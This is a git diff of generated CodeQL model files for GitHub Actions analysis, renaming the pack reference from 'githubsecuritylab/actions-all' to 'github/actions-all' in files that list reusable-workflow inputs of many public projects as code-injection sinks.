@@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index 31d0e691e7f..e3c0040f7df 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index 5f9da314f90..daaa34ab8ab 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index 7ae494adb2b..9bfe6180481 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index dce969719d2..d8cd44f08ee 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index cd5d5ff7d0f..9b1fd73494e 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index fd17e601d80..2fafb1f39b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index bed40dce429..0f4b87acc62 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 62a12e47138..4b58c4a27b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index 7491c4f951a..36e6df71d47 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index 1876f1146cb..444291b0c50 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index 4a8534429f9..ebd11dd1811 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index ecac3f22f85..3dfd3db12f5 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index ffc4193edbf..a47ce91bf1b 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index 93b29308ff2..f4114b0a396 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index c5965c5d8ef..a5b367ab355 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index 1fc5159e55a..5aab353540a 100644 --- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index bce14a98edd..db6b7c28c51 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index 0439d6e1d4c..bd2ceb9eeb1 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index 357e11b3c0b..d52fc08b2fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 4d3ea1e9156..8a664d1bc87 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index 44b905cab67..bbfe6cfc501 100644 
--- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 192d975ea57..75bbf328d64 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 627fca5d3ff..6cd55f46f64 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index 4d4fd0f229e..4c85243e415 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index 1ceacd2f1c0..fd1c5ae4149 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index ba0f5c06a67..d848e7587ca 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index 3c8f11dd0cd..e2e3fa8f593 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index b7c00fff318..69d627bdc7f 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index 5a129691bc5..11687fa31b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index bd07156d06b..3d394751599 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index b029e341710..2fb4ca82763 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 995e692e494..92d91e541b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index db325a06baa..ebf68ff3c12 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 2c91ab62b0c..22f0fedcc07 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 8fdf39a0bbc..23da361034c 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 00fceb9c7bd..19a5da19960 100644 
--- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index a6b947dfbce..abd0215aada 100644 --- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 9359ea482c0..5144d9ee2cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 023666e67ff..5a70ae48ec6 100644 
--- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index 7005b7dd7c9..81130d31fa3 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index 8b73f89401a..f49f239ac9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index 3cf43b814db..53be189b31e 100644 
--- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index d33e308c7eb..2d6132a396f 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 5c1de93f08a..0cb5e01e3aa 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index aab9fa502cb..cd3ca5d7c01 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index b58fff831e1..c8f1b93ef2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index f96264fbf42..7877af9bbbf 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index 6aaf6aa2783..3d9b8716682 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml 
